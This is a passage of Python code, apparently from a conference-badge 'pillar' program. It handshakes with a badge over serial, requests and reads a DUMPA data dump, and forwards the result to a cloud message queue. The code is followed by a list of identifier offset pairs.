if header_message.opcode == OpCode.ACK:
print("Received ACK! Now connected to badge {}!".format(header_message.from_id))
self.active_state = States.CONNECTED
else:
print("Received unknown message! Skipping..")
def connected(self):
# Send DUMPQ messages waiting for a DUMPA.
dump_q_message = HeaderMessage(
OpCode.DUMPQ,
1,
int(self.config.get_master_config_value("PillarID")),
0)
dump_q_payload = PayloadMessage(int(self.config.get_master_config_value("PillarType")))
print("Sending dump Q message!")
print("Dump Q Header: {}".format(dump_q_message.to_serial_payload(dump_q_payload)))
self.serial_dao.write(dump_q_message.to_serial_payload(dump_q_payload))
print("Dump q payload: {}".format(dump_q_payload.to_serial_payload()))
self.serial_dao.write_no_sync(dump_q_payload.to_serial_payload())
message = self.serial_dao.read(self.header_message_length)
try:
SerialUtil.validate_message_header(message)
header_message = HeaderMessage.build_header_object(message[1:])
if header_message.opcode == OpCode.DUMPA:
print("Received DUMPA! Sending update to cloud!")
message = self.serial_dao.read(header_message.payload_len)
payload_message = PayloadMessage.build_payload_object(message)
pillar_message = PillarMessageTransformer\
.transform_serial_message_to_pillar_message(header_message, payload_message)
self.message_client.send_message_to_queue(pillar_message)
self.done = True
else:
print("Unexpected message type!")
except TimeoutError as ex:
print(ex)
except ValueError as ex:
print(ex)
self.active_state = States.DISCONNECTED
| [
[
[
305,
309
],
[
807,
811
]
],
[
[
356,
369
],
[
1220,
1233
]
],
[
[
425,
449
],
[
3582,
3606
]
],
[
[
493,
502
],
[
922,
931
]
],
[
[
547,
557
],
[
1818,
1828
],
[
3149,
3159
]
],
[
[
611,
624
],
[
1513,
1526
],
[
2023,
2036
],
[
2443,
2456
],
[
3223,
3236
]
],
[
[
671,
677
],
[
1541,
1547
],
[
2107,
2113
],
[
2471,
2477
],
[
3311,
3317
]
],
[
[
732,
746
],
[
2610,
2624
],
[
3503,
3517
]
],
[
[
782,
788
],
[
1006,
1012
]
],
[
[
800,
806
],
[
963,
969
],
[
1053,
1059
],
[
1106,
1112
],
[
2246,
2252
],
[
4032,
4038
]
],
[
[
866,
884
]
]
] |